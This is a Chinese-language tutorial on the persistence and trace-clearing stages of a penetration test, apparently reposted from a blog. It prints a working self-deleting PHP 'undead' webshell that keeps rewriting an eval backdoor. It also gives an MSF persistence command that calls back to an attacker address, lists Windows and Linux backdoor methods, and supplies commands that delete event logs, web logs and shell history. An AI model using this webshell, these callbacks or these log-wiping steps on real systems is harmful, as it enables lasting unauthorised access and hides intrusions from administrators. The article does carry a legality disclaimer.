一次完整的渗透测试流程是这样的(下)
2、权限维持
在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。
1)Web后门
1:隐藏后门文件(将文件设置为隐藏)
2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。
<?php set_time_limit(0);//程序执行时间 ignore_user_abort(1);//关掉终端后脚本仍然运行 unlink(__FILE__);//文件完整名 while(1){ file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3"); $b=array_keys($a)[0]; eval($b);?>'); sleep(5);
}
?>
3:404页面隐藏后门,或者在其他自带文件中插入后门代码
(注:以上几种后门方法均能被D盾等工具检测到)
2)Windows系统
1:建立隐藏用户,在用户名后加 $
2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控
3:MSF里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现#反弹时间间隔是5s会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀:
run persistence -X -i 5 -p 8888 -r 192.168.10.27#
然后它就在目标机新建了这个文件:
C:\Windows\TEMP\CJzhFlNOWa.vbs
并把该服务加入了注册表中,只要开机就会启动。
4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。
5:shift后门
6:远程桌面会话劫持
3)Linux系统
1:SSH后门
2:crontab定时任务
3:SSH公钥
4:创建SUID=0的用户
4)痕迹清除
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。
最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。
5)Windows系统
1:如果是windows系统,可用MSF中的 clearev 命令清除痕迹
2:如果3389远程登录过,需要清除mstsc痕迹
3:执行命令清除日志:
del %WINDR%* .log /a/s/q/f
4:如果是web应用,找到web日志文件,删除
6)Linux系统
1:如果是Linux系统,在获取权限后,执行以下命令,不会记录输入过的命令
export HISTFILE=/dev/null export HISTSIZE=0
2:删除 /var/log 目录下的日志文件
3:如果是web应用,找到web日志文件,删除
3、撰写渗透测试保告
在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!
文章来源:网络 版权归原作者所有
上文内容不用于商业目的,如涉及知识产权问题,请权利人联系小编,我们将立即处理
相关文章
- 7个步骤详解AdaBoost 算法原理和构建流程(附代码)
- FIR 带通滤波器参数设计流程
- 如何梳理企业流程管理?
- SpringBoot — 软件许可(License)证书生成+验证+应用完整流程
- 从测试流程角度看产品质量
- ios AppStore 上架流程(Xcode11.5)
- 完整版在xcode打测试专用ipa包流程
- 图解JVM整体结构、执行流程以及2种架构模型,你学会了吗?
- 环境搭建:Oracle GoldenGate 大数据迁移到 Redshift/Flat file/Flume/Kafka测试流程
- 一张图了解-测试工作总体流程
- 【嵌入式开发】LED 驱动 ( LED发光二极管原理 | 底板原理图分析 | 核心板原理图分析 | GPIO | 裸板程序烧写流程 )
- 个性化测试流程,不搞一刀切
- 尚观MySQL运维技术及全流程教程(尚观mysql运维教程)
- 使用SSL保护MySQL数据库的通信流程(usesslmysql)
- Oracle关闭流程全面攻克难题(Oracle关闭流程)